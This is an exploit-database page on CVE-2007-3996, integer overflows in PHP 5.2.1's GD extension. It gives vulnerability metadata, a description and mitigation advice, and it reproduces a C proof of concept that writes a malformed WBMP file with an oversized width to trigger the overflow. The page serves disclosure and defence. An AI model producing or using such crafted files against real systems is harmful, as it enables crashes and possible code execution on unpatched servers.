header-logo
Suggest Exploit
vendor:
PHP
by:
Unknown
7.5
CVSS
HIGH
Integer-Overflow
190
CWE
Product Name: PHP
Affected Version From: PHP 5.2.1
Affected Version To: PHP 5.2.1
Patch Exists: NO
Related CWE: CVE-2007-3996
CPE: a:php:php:5.2.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0720/https://www.rapid7.com/db/vulnerabilities/php-cve-2007-3996/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0889/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0890/https://www.rapid7.com/db/vulnerabilities/php-cve-2007-4657/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0917/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2007-3996/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2007-4657/https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-3996/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0891/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0889/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0890/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0888/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2007-0888/
Other Scripts:
Platforms Tested:
Unknown

Integer-Overflow Vulnerabilities in PHP’s GD Extension

PHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun. Successfully exploiting these issues allows attackers to crash the affected application, potentially denying service to legitimate users. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.

Mitigation:

Upgrade to a non-vulnerable version of PHP or apply patches provided by the vendor.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/23357/info

PHP's GD extension is prone to two integer-overflow vulnerabilities because it fails to ensure that integer values aren't overrun.

Successfully exploiting these issues allows attackers to crash the affected application, potentially denying service to legitimate users. Due to the nature of the issues, code execution may also be possible, but this has not been confirmed.

PHP 5.2.1 and prior versions are vulnerable. 

#define BUFSIZE 1000000

#include <stdio.h>

int main()
{
      int c;
      char buf[BUFSIZE];

      FILE *fp = fopen("test.wbmp","w");

      //write header
      c = 0;
      fputc(c,fp);
      fputc(c,fp);

      //write width = 2^32 / 4 + 1
      c = 0x84;
      fputc(c,fp);
      c = 0x80;
      fputc(c,fp);
      fputc(c,fp);
      fputc(c,fp);
      c = 0x01;
      fputc(c,fp);

      //write height = 4
      c = 0x04;
      fputc(c,fp);

      //write some data to cause overflow
      fwrite(buf,sizeof(buf),1,fp);

      fclose(fp);
}

Navigation

Suggest Exploit

Services By CQR